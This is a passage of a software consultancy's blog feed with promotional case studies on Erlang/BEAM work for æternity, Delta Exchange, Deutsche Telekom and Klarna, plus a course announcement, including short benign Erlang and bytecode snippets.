&lt;p&gt;If we compile the Sophia Identity contract to AEVM we get a slightly smaller bytecode:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-wasm&quot;&gt;PUSH3 0, 0, 100 PUSH3 0, 0, 132 SWAP2 DUP1 DUP1 DUP1
MLOAD PUSH32 185, 201, 86, 242, 139, 49, 73, 169, 245,
152, 122, 165, 5, 243, 218, 27, 34, 9, 204, 87, 57, 35,
64, 6, 43, 182, 193, 189, 159, 159, 153, 234 EQ PUSH3 0,
0, 192 JUMPI POP DUP1 MLOAD PUSH32 104, 242, 103, 99,
56, 255, 80, 136, 57, 171, 164, 119, 73, 239, 250, 139,
232, 126, 242, 132, 242, 7, 251, 61, 153, 152, 112, 28,
213, 56, 135, 197 EQ PUSH3 0, 0, 175 JUMPI POP PUSH1 1
NOT MLOAD STOP JUMPDEST PUSH1 0 NOT MSIZE PUSH1 32 ADD
SWAP1 DUP2 MSTORE PUSH1 32 SWAP1 SUB PUSH1 3 DUP2 MSTORE
SWAP1 MSIZE PUSH1 0 MLOAD MSIZE MSTORE PUSH1 0 MSTORE
PUSH1 0 RETURN JUMPDEST PUSH1 0 DUP1 MSTORE PUSH1 0
RETURN JUMPDEST MSIZE MSIZE PUSH1 32 ADD SWAP1 DUP2
MSTORE PUSH1 32 SWAP1 SUB PUSH1 0 NOT MSIZE PUSH1 32 ADD
SWAP1 DUP2 MSTORE PUSH1 32 SWAP1 SUB PUSH1 3 DUP2 MSTORE
DUP2 MSTORE SWAP1 JUMP JUMPDEST PUSH1 32 ADD MLOAD MLOAD
MSIZE POP DUP1 SWAP2 POP POP DUP1 SWAP1 POP SWAP1 JUMP
JUMPDEST POP POP DUP3 SWAP2 POP POP PUSH3 0, 0, 140 JUMP
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When we compile the Sophia Identity contract to FATE we get:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-wasm&quot;&gt;FUNCTION init() : {tuple,[]}
    ;; BB : 0
    STORE store1 ()
    RETURNR ()

FUNCTION main(integer) : integer
    ;; BB : 0
    RETURNR arg0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That&#39;s it. That is the actual FATE assembler code. Short, readable and to the point.&lt;/p&gt;
&lt;p&gt;In conclusion, the FATE (Fast æternity Transaction Engine) virtual machine offers several advantages
in terms of safety, efficiency, and cost-effectiveness compared to other blockchain virtual machines
like AEVM (æternity Ethereum Virtual Machine).&lt;/p&gt;
&lt;p&gt;Overall, FATE serves as an efficient and secure transaction engine for executing smart
contracts. Its type safety, deterministic nature, and gas-limited memory and execution provide a
reliable and predictable environment for building decentralized applications. With its compact
bytecode and improved performance, FATE offers an enhanced user experience and cost-effective
utilization of blockchain resources.&lt;/p&gt;
&lt;h2 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;In the æternity project we used many of the services that HappiHacking is known for:&lt;/p&gt;
&lt;dl&gt;
&lt;dt&gt;Rapid Prototyping&lt;/dt&gt;
&lt;dd&gt;We developed the AEVM in two weeks, proving that it would be feasible to write a virtual machine
for æternity.&lt;/dd&gt;
&lt;dt&gt;The Happy Path Method&lt;/dt&gt;
&lt;dd&gt;Throughout the project we developed the most important aspects first, and quickly, without sacrificing
quality or performance, steering the project forward with a gentle hand even when we didn&#39;t have
formal leadership roles.&lt;/dd&gt;
&lt;dt&gt;Rubberducking as a Service&lt;/dt&gt;
&lt;dd&gt;We were there for the rest of the development team and management to discuss ideas and solutions.&lt;/dd&gt;
&lt;dt&gt;Erlang &amp;amp; Beam Expertise&lt;/dt&gt;
&lt;dd&gt;With our long experience in developing production-quality Erlang systems, we managed to get a
performant, reliable, robust, and scalable blockchain system built in time.&lt;/dd&gt;
&lt;/dl&gt;
&lt;div style=&quot;text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/erlang_beer.jpg&quot; alt=&quot;A beer
  glass with an Erlang logo.&quot; title=&quot;A beer
  glass with an Erlang logo.&quot; /&gt; &lt;/div&gt;
&lt;dl&gt;
&lt;dt&gt;Full-Service Project Partner&lt;/dt&gt;
&lt;dd&gt;We took an idea that was mostly in the head of the founder of æternity and turned it into a design,
an architecture, a working system, and a live deployment.&lt;/dd&gt;
&lt;dt&gt;Deep-dive analysis and problem solving&lt;/dt&gt;
&lt;dd&gt;We took our time to really understand the domain, and then we designed Sophia and FATE.  We also
worked on many other problems in the blockchain world such as Merkle Patricia Tries, oracles, state
channels, names, accounts, Bitcoin.NG, proof of work and more.&lt;/dd&gt;
&lt;dt&gt;System Validation through Tech Lead Mentoring&lt;/dt&gt;
&lt;dd&gt;Tobias and I embedded ourselves in the development team, where we could mentor more junior developers,
review code, and make sure the system architecture was solid.&lt;/dd&gt;
&lt;dt&gt;Team management&lt;/dt&gt;
&lt;dd&gt;Happi often led daily stand-ups and discussions when the team met.&lt;/dd&gt;
&lt;dt&gt;Project management&lt;/dt&gt;
&lt;dd&gt;We helped the formal project manager with the direction of the project on a higher level.&lt;/dd&gt;
&lt;/dl&gt;
&lt;p&gt;We will try to come back with another blog article about some of the lessons we learned implementing
a blockchain from scratch. (Hint: Merkle Patricia Tries are really cool.)&lt;/p&gt;
&lt;p&gt;We were not alone in the project so I want to give a big thank you and shout out to the whole team,
you know who you are!&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Unleashing the Power of Erlang&#39;s BEAM</title>
    <link href="https://happihacking.com/blog/posts/2023/delta/"/>
    <updated>2023-05-30T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/delta/</id>
    <summary>A case study with Delta Exchange</summary>
    <content type="html">&lt;p&gt;Today I will share some insight from our collaboration with Delta Exchange (aka Delta), a leading
player in the cryptocurrency trading space. At HappiHacking, our team of experts had the privilege
of working closely with Delta Exchange to address their architectural challenges, scale their
system, and provide comprehensive education on the BEAM virtual machine.&lt;/p&gt;
&lt;p&gt;This case study highlights some of the things we do best at HappiHacking. We help our customers to
help themselves. With our experience in software development and specifically from high-performance
BEAM systems, we can quickly pinpoint problems and suggest solutions. It also shows our ability to
share our experience and educate our customers.&lt;/p&gt;
&lt;p&gt;We call this service Rubberducking as a Service™ (RDaaS™).&lt;/p&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/rubberducking.jpg&quot; alt=&quot;A computer and a rubber duck and two people talking.&quot; title=&quot;A computer and a rubber duck and two people talking.&quot; /&gt;
&lt;h3 id=&quot;part-1-architectural-review-and-scalability-challenges&quot; tabindex=&quot;-1&quot;&gt;Part 1: Architectural Review and Scalability Challenges&lt;/h3&gt;
&lt;p&gt;Delta Exchange has been at the forefront, providing a robust platform for matching trades between
buyers and sellers. However, every successful system faces its share of challenges, and Delta
Exchange is no exception. In the world of high-volume cryptocurrency trading, scalability and
efficient processing are paramount. Delta Exchange approached us with a specific need - to optimize
their application&#39;s performance, enhance distribution across nodes, and identify any architectural
bottlenecks.&lt;/p&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/live_auction.jpg&quot; alt=&quot;An auction interface.&quot; title=&quot;An auction interface.&quot; /&gt;
&lt;p&gt;We meticulously reviewed their existing architecture, considering the nuances of the BEAM scheduler,
and identified areas for improvement. From optimizing process distribution and supervisor structures
to investigating run queue size fluctuations, we left no stone unturned in our pursuit of
architectural excellence.&lt;/p&gt;
&lt;h4&gt;The RabbitMQ Conundrum:&lt;/h4&gt;
&lt;p&gt;During our work, Delta encountered a problem with RabbitMQ overloading Mnesia (Erlang&#39;s built-in
database). This raised concerns and prompted the need to understand the issue in depth to prevent it
from happening again. To investigate the problem, HappiHacking engaged in a detailed analysis of the
RabbitMQ architecture. It was revealed that the size of certain RabbitMQ files indicated
considerable activity in the corresponding tables. While the Mnesia warning was deemed harmless, the
sheer number of queues raised eyebrows and pointed to potential architectural considerations.&lt;/p&gt;
&lt;h4&gt;Optimizations and Learnings:&lt;/h4&gt;
&lt;p&gt;The team at Delta Exchange delved into optimizing their system to address the challenges they
encountered. They identified areas for improvement, such as reducing redundant data in inter-process
communication and migrating away from Mnesia to alternative data storage solutions like ETS and
Redis. These optimizations not only enhanced system efficiency but also paved the way for a more
streamlined and scalable architecture.&lt;/p&gt;
&lt;h4&gt;Unraveling the GenServer Timeouts&lt;/h4&gt;
&lt;p&gt;We also discovered some problems with GenServer call timeouts. With GenServer processes timing out
during &lt;code&gt;handle_call&lt;/code&gt; callbacks, it became apparent that congestion was a likely culprit. Tobias recommended
examining network throughput and monitoring bursts in Erlang processes and message queues to
identify the point of origin. Additionally, increasing the distribution buffer busy limit and
investigating network-level congestion were suggested as potential solutions.&lt;/p&gt;
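&lt;p&gt;As a concrete illustration (the function and message names here are hypothetical, not Delta&#39;s actual code), a congestion-prone call can be guarded with an explicit timeout instead of relying on the 5-second default:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%% Illustrative sketch: guard a gen_server call with an explicit timeout.
handle_price_request(Pid, Request) -&gt;
    try
        gen_server:call(Pid, Request, 2000)   %% 2 s instead of the 5 s default
    catch
        exit:{timeout, _} -&gt;
            %% The callee may still reply later; log the event and let
            %% the caller decide whether to retry or shed load.
            {error, timeout}
    end.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The distribution buffer busy limit mentioned above is set when the node starts, for example &lt;code&gt;erl +zdbbl 32768&lt;/code&gt; (the value is in kilobytes).&lt;/p&gt;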
&lt;h4&gt;Tools for Monitoring and Postmortem Analysis:&lt;/h4&gt;
&lt;p&gt;Delta also sought advice on monitoring tools to aid in tracking bursts in Erlang processes and
message queues. Tobias highlighted the importance of having systems in place to report such events
and examine them postmortem. While interactive monitoring through tools like the Observer CLI and
sorting processes based on reductions and message queues can be helpful, it&#39;s advantageous to have a
comprehensive monitoring infrastructure to gain deeper insights into system behavior.&lt;/p&gt;
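&lt;p&gt;For a quick interactive look, the Erlang shell alone goes a long way. Here is a sketch of the kind of one-off probe we mean, not a replacement for real monitoring infrastructure:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%% Illustrative snippet: the N processes with the longest message queues.
top_queues(N) -&gt;
    Qs = [{Len, Pid}
          || Pid &lt;- erlang:processes(),
             {message_queue_len, Len} &lt;- [erlang:process_info(Pid, message_queue_len)]],
    lists:sublist(lists:reverse(lists:sort(Qs)), N).
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Sorting on &lt;code&gt;reductions&lt;/code&gt; instead of &lt;code&gt;message_queue_len&lt;/code&gt; gives the busiest processes rather than the most congested ones.&lt;/p&gt;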
&lt;p&gt;We have since developed this material into a full course; you can read more about it in the post &lt;a href=&quot;https://happihacking.com/blog/posts/2023/course_on_beam/&quot;&gt;Unlocking Performance: Introducing HappiHacking&#39;s New
Course on BEAM&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id=&quot;part-2-harnessing-the-power-of-beam-vm&quot; tabindex=&quot;-1&quot;&gt;Part 2: Harnessing the Power of BEAM VM&lt;/h3&gt;
&lt;p&gt;To empower Delta Exchange&#39;s team with in-depth knowledge, we designed a series of comprehensive BEAM
VM courses. Our experienced instructors educated Delta Exchange personnel on the inner workings of
the BEAM virtual machine, covering critical topics such as processes, memory subsystems, networking,
debugging, and more. Through engaging lectures, hands-on exercises, and ongoing support, we equipped
Delta Exchange&#39;s team with the tools and insights needed to harness the full potential of BEAM.&lt;/p&gt;
&lt;h3 id=&quot;outcomes-and-achievements&quot; tabindex=&quot;-1&quot;&gt;Outcomes and Achievements:&lt;/h3&gt;
&lt;p&gt;Delta Exchange&#39;s experience with scaling challenges and production insights demonstrates their
commitment to providing a high-performance trading platform.&lt;/p&gt;
&lt;p&gt;Thanks to our collaborative efforts, Delta Exchange experienced significant improvements in its
system&#39;s performance, scalability, and overall architecture. The architectural review led to the
implementation of optimized process distribution, enhanced supervisor structures, and proactive
measures to mitigate run queue size issues. Additionally, the BEAM VM education equipped Delta
Exchange&#39;s personnel with a deep understanding of the virtual machine, empowering them to make
informed decisions and drive continuous improvement.&lt;/p&gt;
&lt;p&gt;One notable optimization was the reduction of redundant data in inter-process communication. By
carefully optimizing payloads and leveraging technologies like &#39;protobuf&#39;, Delta Exchange
significantly reduced payload sizes, resulting in enhanced efficiency and improved overall system
performance.&lt;/p&gt;
&lt;p&gt;Additionally, Delta Exchange made a strategic decision to migrate away from Mnesia and embrace
alternative data storage solutions like ETS and Redis. This shift not only provided them with more
flexibility but also allowed them to leverage the unique capabilities of these technologies for
their specific use cases.&lt;/p&gt;
&lt;p&gt;Their commitment to continuous improvement and willingness to explore new technologies sets them
apart in the fast-paced world of cryptocurrency trading.&lt;/p&gt;
&lt;p&gt;As Delta Exchange continues to push the boundaries of cryptocurrency trading, they stand ready to
face future challenges armed with knowledge and experience. The lessons learned from their RabbitMQ
adventures serve as a reminder that continuous optimization and monitoring are essential components
of building and maintaining a robust and scalable system.&lt;/p&gt;
&lt;p&gt;We&#39;re proud to have played a pivotal role in helping Delta Exchange tackle its scalability
challenges and unlock the true power of the BEAM virtual machine. Our collaboration stands as a
testament to the transformative impact of architectural review, scalability solutions, and
comprehensive education.&lt;/p&gt;
&lt;p&gt;Are you ready to unleash the full potential of your software system? Contact HappiHacking today and
enjoy a world of optimized performance, scalable architecture, and unrivaled expertise.&lt;/p&gt;
&lt;p&gt;For the technical foundations behind the BEAM scheduler, process memory,
and monitoring tools discussed in this case study, see
&lt;a href=&quot;https://happihacking.com/resources/the-beam-book/&quot;&gt;The BEAM Book&lt;/a&gt;.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Rapid Prototyping</title>
    <link href="https://happihacking.com/blog/posts/2023/iot_pipeline/"/>
    <updated>2023-05-29T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/iot_pipeline/</id>
    <summary>Building a production ready MVP in 3 months</summary>
    <content type="html">&lt;p&gt;Today, we want to talk about on of our exciting projects with Deutsche Telekom, one of Europe&#39;s largest telecom providers. Together, we embarked on a mission to revolutionize the Smart Home industry, all while adhering to GDPR and ensuring scalable, data-driven innovation. This is yet another testimony of the success of the Happy Path Method&lt;sup&gt;TM&lt;/sup&gt;.&lt;/p&gt;
&lt;img class=&quot;img-blog &quot; src=&quot;https://happihacking.com/images/iot_and_taba.jpg&quot; alt=&quot;The team with the IoT pipeline on a whiteboard in the background.&quot; title=&quot;The team with the IoT pipeline on a whiteboard in the background.&quot; /&gt;
&lt;p&gt;Telekom, as they prefer to call themselves, needed a system that could seamlessly handle a staggering one billion transactions per day, all while tackling the complexities of data anonymization. But here&#39;s the twist: they still wanted to extract valuable insights through statistical analysis from this anonymized data. Challenge accepted!&lt;/p&gt;
&lt;p&gt;We got the request in late December from an innovation department at Telekom. They needed to convince
upper management that it was possible to build a system that could handle this amount of traffic within
a reasonable budget. The problem was that this proof was needed by January in order to be approved in the next year&#39;s
budget.&lt;/p&gt;
&lt;p&gt;In just three short weeks, our HappiHacking team, armed with Erlang, Kafka, and the Happy Path Method, built a proof-of-concept solution that could easily handle over 15,000 transactions per second while anonymizing all data in a GDPR-compliant way. This convinced Deutsche Telekom&#39;s management of the project&#39;s feasibility. With a bit of Swedish humor and a relentless pursuit of value delivery, we showed that innovation doesn&#39;t have to be a long and tedious process.&lt;/p&gt;
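&lt;p&gt;The pseudonymization step at the heart of such a pipeline can be sketched like this (a hypothetical illustration with invented field names, not Telekom&#39;s actual code): the device identifier is replaced by a keyed hash before the event is published to Kafka, so events from the same device can still be correlated for statistics without exposing the identity.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%% Hypothetical sketch of pseudonymization; the field names are invented.
anonymize(Event = #{device_id := Id}, Secret) -&gt;
    %% HMAC-SHA256 keeps the mapping stable per secret but irreversible
    %% without it, so aggregate statistics still work on the output.
    Pseudonym = binary:encode_hex(crypto:mac(hmac, sha256, Secret, Id)),
    Event#{device_id := Pseudonym}.
&lt;/code&gt;&lt;/pre&gt;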
&lt;p&gt;Unfortunately, there was a political policy decision at Telekom at the time that only allowed the use of three programming languages in production. Erlang was strangely not one of them, but Java was. So over the next three months, we worked tirelessly to transform our Erlang proof of concept into a production-ready solution in Java.
It still used the same Kafka setup, anonymization, and Grafana monitoring, but some of the endpoints were reimplemented in Java on the corporately approved Spring Boot framework. This required a bit more work, but HappiHacking&#39;s team of experts designed an architecture that could handle the massive data volume, ensuring smooth transactional systems capable of handling billions of messages each day.&lt;/p&gt;
&lt;p&gt;This innovative data streaming solution paved the way for Deutsche Telekom&#39;s own team to build new services upon our foundation. Among those services was the &lt;a href=&quot;https://www.red-dot.org/project/magentazuhause-app-60924&quot;&gt;MagentaZuhause App&lt;/a&gt; which received a reddot award.&lt;/p&gt;
&lt;p&gt;As a little side project, we also managed to get data from a Magenta TV set-top box, which was a black box to us. By combining bash scripts, C, regexps, and some innovative hacking, we managed to get information from the TV, and
we could also turn the TV on and off remotely within a few milliseconds. This proved that we could build a service for remotely managing a TV in the home. For a real product we would of course build it into the software, which another department within Telekom had access to, but such a cross-department project could take months to get started.&lt;/p&gt;
&lt;p&gt;&amp;quot; - Why did the smart TV get turned off?&amp;quot; &lt;br /&gt;
&amp;quot; - Happi&#39;s joke was so bad.&amp;quot;&lt;/p&gt;
&lt;p&gt;Throughout the project, our partnership with Deutsche Telekom flourished. Together, we navigated the intricacies of the Smart Home landscape, crafting solutions that blended robust data handling with GDPR compliance. Our motivated HappiHacking team went the extra mile, delivering qualitative results while sharing a few bad jokes along the way.&lt;/p&gt;
&lt;p&gt;In the words of Filiz Hazer-Yilmaz, Deutsche Telekom&#39;s representative: &amp;quot;If you are searching for a motivated team that will go the last mile with you, deliver qualitative stuff, and understand bad jokes…HappiHacking is the right choice!&amp;quot;&lt;/p&gt;
&lt;p&gt;At HappiHacking, we thrive on challenging projects that push the boundaries of innovation. Our Smart Home collaboration with Deutsche Telekom exemplifies the power of rapid prototyping, scalable systems, and a touch of Swedish irreverence. We&#39;re proud to have played a part in designing and implementing new IoT services, revolutionizing the Smart Home experience for Deutsche Telekom&#39;s customers.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Taming the Spaghetti Monster: The Birth of Kappa</title>
    <link href="https://happihacking.com/blog/posts/2023/kappa/"/>
    <updated>2023-05-26T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/kappa/</id>
    <summary>Solving Codebase Complexity at Klarna with a Business Layers Strategy</summary>
    <content type="html">&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/spaghetti.jpg&quot; alt=&quot;A plate of spaghetti and layers of Burrata and bacon&quot; title=&quot;A plate of spaghetti and layers of Burrata and bacon&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;In the early days at Klarna (a period I covered in &lt;a href=&quot;https://happihacking.com/blog/posts/2023/erlang-history/&quot;&gt;Three Decades with Erlang&lt;/a&gt;), as our codebase grew exponentially, a peculiar problem began to manifest. Our expansive Erlang code base, like an unruly hydra, developed a tendency to morph into a maze of spaghetti code. The issue? Erlang functions, being either local to a module or exported universally, had a propensity for bypassing the carefully laid out APIs of our subsystems. As a result, library functions across subsystems could directly communicate, ignoring the module divisions that were supposed to enforce a clean code structure. It was a classic case of an organizational nightmare - the spaghetti monster was upon us.&lt;/p&gt;
&lt;p&gt;Faced with this challenge, my colleagues Richard and Tobias and I knew we had to act swiftly. We devised a plan that involved introducing business layers, coupled with enforcing rules through the build system to thwart any such infractions. This strategy was designed to control how different parts of the codebase could interact with each other. The result was the creation of an internal system that we affectionately named &amp;quot;Kappa&amp;quot;.&lt;/p&gt;
&lt;p&gt;Kappa was designed to answer the call for efficient means to manage the increasing complexity in our codebase. With Kappa, we were able to trace the ownership of specific applications, modules, or even database tables. It gave us an eagle-eye view of our codebase, pointing out which team was responsible for what part of the code and how to contact them. This made our development process significantly more organized and facilitated a higher level of accountability.&lt;/p&gt;
&lt;p&gt;Further, Kappa allowed us to establish &#39;Application API modules&#39; to curb inter-application calls to a select API set, preventing calls to private modules of other apps. The &#39;Restricted record fields usage&#39; made alterations to record structures easier by only allowing specified modules to access specific record fields directly. We also introduced &#39;Code Layers&#39;, which essentially divided our apps into multiple layers, each with specific roles and restrictions concerning inter-layer communication.&lt;/p&gt;
&lt;p&gt;The effects of implementing Kappa were almost immediate - we saw a significant improvement in code modularity, traceability, and the overall quality of our codebase. The spaghetti monster was finally tamed!&lt;/p&gt;
&lt;p&gt;What started as a small internal project to tackle a growing concern transformed into a powerful tool that enabled us to navigate a complex codebase and bring it under control. Today, part of Kappa&#39;s code has been open-sourced, offering a glimpse into the structures we used to control our code at Klarna.&lt;/p&gt;
&lt;p&gt;The creation and implementation of Kappa serve as a testament to HappiHacking&#39;s dedication to finding effective solutions in the realm of software development. Our battle with the spaghetti monster has given us a deeper understanding of the nuances involved in managing a large codebase. Armed with this knowledge and experience, we at HappiHacking are committed to helping you navigate the complexities of your codebase and deliver value as efficiently as possible.&lt;/p&gt;
&lt;p&gt;You can find Kappa &lt;a href=&quot;https://github.com/klarna-incubator/kappa&quot;&gt;on GitHub&lt;/a&gt;.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>The &#39;Happy Path Method&#39;™ - Reshaping Software Development with Agile Excellence</title>
    <link href="https://happihacking.com/blog/posts/2023/the_happy_path/"/>
    <updated>2023-05-25T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/the_happy_path/</id>
    <summary>Maximizing Value, Minimizing Time: The HappiHacking Way</summary>
    <content type="html">&lt;p&gt;In software development, time often surpasses money as the most valuable resource. Projects that are delayed or become stagnant incur more costs than those executed swiftly and efficiently. Also, the faster the value of a project can be reaped the faster the project start paying for itself.&lt;/p&gt;
&lt;p&gt;With this realization at the forefront, we at HappiHacking have developed a unique approach to software development: the &#39;Happy Path Method&#39;™. This revolutionary method, inspired by the &amp;quot;let it crash&amp;quot; thinking inherent in Erlang programming and our philosophy that &amp;quot;time is greater than money,&amp;quot; is setting a new benchmark in the agile software development realm.&lt;/p&gt;
&lt;p&gt;The &#39;Happy Path Method&#39;™ focuses on value delivery, aiming to extract and deliver the utmost value from a project as swiftly as possible. It’s not merely about creating code, but about crafting intelligent, efficient solutions that align with your strategic goals. Our method puts the most impactful tasks front and center, ensuring that the most value is obtained upfront, accelerating the return on investment.&lt;/p&gt;
&lt;p&gt;A significant influence on our approach is the Erlang programming language, renowned for its robust, fault-tolerant systems and concurrency. The &amp;quot;let it crash&amp;quot; philosophy of Erlang encourages the creation of systems that recover quickly from failures rather than attempting to prevent all possible errors - a philosophy we’ve carried into the &#39;Happy Path Method&#39;™. We focus on building the core, essential functionality first (the &amp;quot;happy path&amp;quot;), while allowing for the fact that there may be bumps and obstacles along the way. This approach enables us to deliver software that&#39;s robust and adaptable, offering high value while mitigating risks.&lt;/p&gt;
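In Erlang terms, &amp;quot;let it crash&amp;quot; usually means putting workers under a supervisor and letting the supervisor restart them on failure, rather than defending against every bad input inside the worker. A minimal sketch, with invented module names:

```erlang
%% Hypothetical sketch of a "let it crash" supervision setup.
-module(happy_sup).
-behaviour(supervisor).
-export([start_link/0, init/1]).

start_link() ->
    supervisor:start_link({local, ?MODULE}, ?MODULE, []).

init([]) ->
    %% If happy_worker crashes, restart it -- up to 5 times in
    %% 10 seconds before the supervisor itself gives up.
    SupFlags = #{strategy => one_for_one, intensity => 5, period => 10},
    Children = [#{id => worker,
                  start => {happy_worker, start_link, []}}],
    {ok, {SupFlags, Children}}.
```

The worker handles the happy path; the supervisor handles recovery. That separation of concerns is the same split the method applies at the project level.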
&lt;p&gt;The &#39;Happy Path Method&#39;™ does not cut corners or compromise on quality. On the contrary, it emphasizes the importance of delivering a high-quality, working product with the most crucial features first, thus ensuring a more efficient and productive use of time and resources. It allows us to incrementally refine and enhance the product, resulting in a mature, robust solution that meets all requirements while exceeding expectations.&lt;/p&gt;
&lt;p&gt;Implementing the &#39;Happy Path Method&#39;™, we&#39;ve helped numerous clients achieve their goals faster and more effectively than they ever imagined possible. For instance, our work with &lt;a href=&quot;https://happihacking.com/blog/posts/2023/Installment_plans/&quot;&gt;Klarna&#39;s installment plans project&lt;/a&gt; is a testament to the power of the &#39;Happy Path Method&#39;™, where we transformed a grand vision into an operative reality within an impressively short timeframe, all while ensuring meticulous regulatory compliance and precision.&lt;/p&gt;
&lt;p&gt;The &#39;Happy Path Method&#39;™ is more than just a technique; it&#39;s a philosophy of prioritizing value over the ticking clock, of understanding that time is, indeed, greater than money. It encapsulates the ethos of HappiHacking - delivering high-quality, efficient solutions that truly make a difference. We invite you to experience the difference of the &#39;Happy Path Method&#39;™. After all, the path to happiness is paved with successful software deployments!&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>HappiHacking&#39;s Just in Time Development</title>
    <link href="https://happihacking.com/blog/posts/2023/Installment_plans/"/>
    <updated>2023-05-24T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/Installment_plans/</id>
    <summary>An Agile Success Story with Klarna&#39;s Installment Plans</summary>
    <content type="html">&lt;p&gt;I served as the Head of Engineering in Klarna&#39;s early days. With a lean yet proficient team of five, we managed to manifest the vision of Klarna&#39;s flexible installment plans through rapid prototyping - setting a new precedent in agile development.&lt;/p&gt;
&lt;p&gt;Klarna had a mission: to let customers choose flexible payment installments. Translating this vision into reality required far more than a great idea. It demanded exceptional expertise, agile efficiency, and a profound comprehension of local rules and legislation.&lt;/p&gt;
&lt;p&gt;Our project was about speed, yes, but it was also about careful compliance and precision. Harnessing our unique agile development approach, &lt;a href=&quot;https://happihacking.com/blog/posts/2023/the_happy_path/&quot;&gt;the Happy Path Method&lt;/a&gt;, we were tasked with creating a system that met Klarna&#39;s specific requirements, complied with local regulations, and was delivered within an impressively short time. We started by thoroughly analyzing the proposed solution, then concentrated our efforts on delivering value swiftly and effectively.&lt;/p&gt;
&lt;p&gt;The project kicked off in August, aiming to be ready for the Christmas shopping rush. We adopted incremental releases as a strategic tool to ensure continuous progress and timely delivery - an approach that epitomizes the potency of agile methodologies. This enabled us to gather regular feedback, make necessary adjustments, and adapt to ensure the final product perfectly suited Klarna&#39;s needs.&lt;/p&gt;
&lt;p&gt;By October, just two months after the project kick-off, the first iteration of the installment plan system was launched. This was more than a major milestone; it was a demonstration of our formidable development skills and dedication to delivering within the deadline. This early release enabled webshops to begin offering installment plans as a payment method, even though invoicing end customers, receiving payments, and calculating interest were not yet functional. However, by fully understanding the service, we knew these components wouldn&#39;t be required until one month after the first customer purchase - leaving ample time for further development.&lt;/p&gt;
&lt;p&gt;Post initial release, we relentlessly refined and enhanced the system, adding features just in time. Our efforts ranged from introducing invoicing and handling payments to calculating interest, all the while optimizing the system for performance, security, and usability.&lt;/p&gt;
&lt;p&gt;By February, a short six months since project initiation, the system was not only live but also a dominant player in the Swedish market. This remarkable growth, both rapid and robust, underscores the effectiveness of our implementation strategy and the intrinsic value of the installment plan solution.&lt;/p&gt;
&lt;p&gt;Our journey with Klarna&#39;s installment plan system is more than an agile success story. It&#39;s a testament to the power of understanding client needs, delivering rapid yet reliable solutions, and maintaining meticulous regulatory compliance in the FinTech industry. It&#39;s a reflection of HappiHacking&#39;s philosophy: to create high-quality, efficient solutions that make a genuine impact.&lt;/p&gt;
&lt;p&gt;Through our unique blend of speed, precision, and agility, HappiHacking is constantly pushing the boundaries of what&#39;s possible in software development.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Unlocking Performance: Introducing HappiHacking&#39;s New Course on BEAM</title>
    <link href="https://happihacking.com/blog/posts/2023/course_on_beam/"/>
    <updated>2023-05-23T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/course_on_beam/</id>
    <content type="html">&lt;p&gt;We&#39;re thrilled to announce our latest offering: an in-depth course dedicated to understanding and optimizing performance in BEAM, the virtual machine that powers Erlang and Elixir programming languages.&lt;/p&gt;
&lt;p&gt;Our course offers you the tools and knowledge to truly harness the power of BEAM, with a curriculum covering essential topics such as:&lt;/p&gt;
&lt;p&gt;Thinking in Processes: BEAM&#39;s unique strength lies in its process-oriented design, offering massive scalability and robust error handling. This course segment demystifies concurrent programming, guiding learners to think in processes, a foundational shift that can supercharge your coding efficiency.&lt;/p&gt;
&lt;p&gt;Memory &amp;amp; Garbage Collection (GC): Master the nuances of memory management within the BEAM environment. We&#39;ll dive deep into the inner workings of BEAM&#39;s per-process, soft real-time garbage collection, a crucial knowledge area for writing efficient, high-performance code.&lt;/p&gt;
&lt;p&gt;Data and Scheduling: Learn the art of data management and scheduling in BEAM&#39;s concurrent system. This section explains how BEAM schedules processes and manages data, ensuring smooth operation even under heavy loads.&lt;/p&gt;
&lt;p&gt;IO: This module explores input/output operations, often the bottleneck in application performance. We&#39;ll take a granular look at BEAM&#39;s approach to IO, providing practical strategies for optimization.&lt;/p&gt;
&lt;p&gt;The VM and The Compiler: Get up close with the BEAM Virtual Machine and its compiler. We provide an in-depth exploration of these core components, shedding light on their roles in the overall system performance.&lt;/p&gt;
&lt;p&gt;Operations, Monitoring, and Debugging: To run a successful application in production, one must know how to monitor, debug, and perform various operations efficiently. Our course equips you with these critical skills, turning potential challenges into opportunities for improvement.&lt;/p&gt;
&lt;p&gt;Performance: Finally, we delve into performance optimization. Armed with knowledge from the previous sections, you&#39;ll learn how to fine-tune your BEAM-powered applications for maximum speed and efficiency.&lt;/p&gt;
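To give a small taste of the &amp;quot;Thinking in Processes&amp;quot; module, here is a toy example (invented for this post, not course material): each counter is its own process holding its own state, and the only way to interact with it is by sending messages.

```erlang
%% Toy example: state lives inside a process, reached only via messages.
-module(counter).
-export([start/0, bump/1, read/1]).

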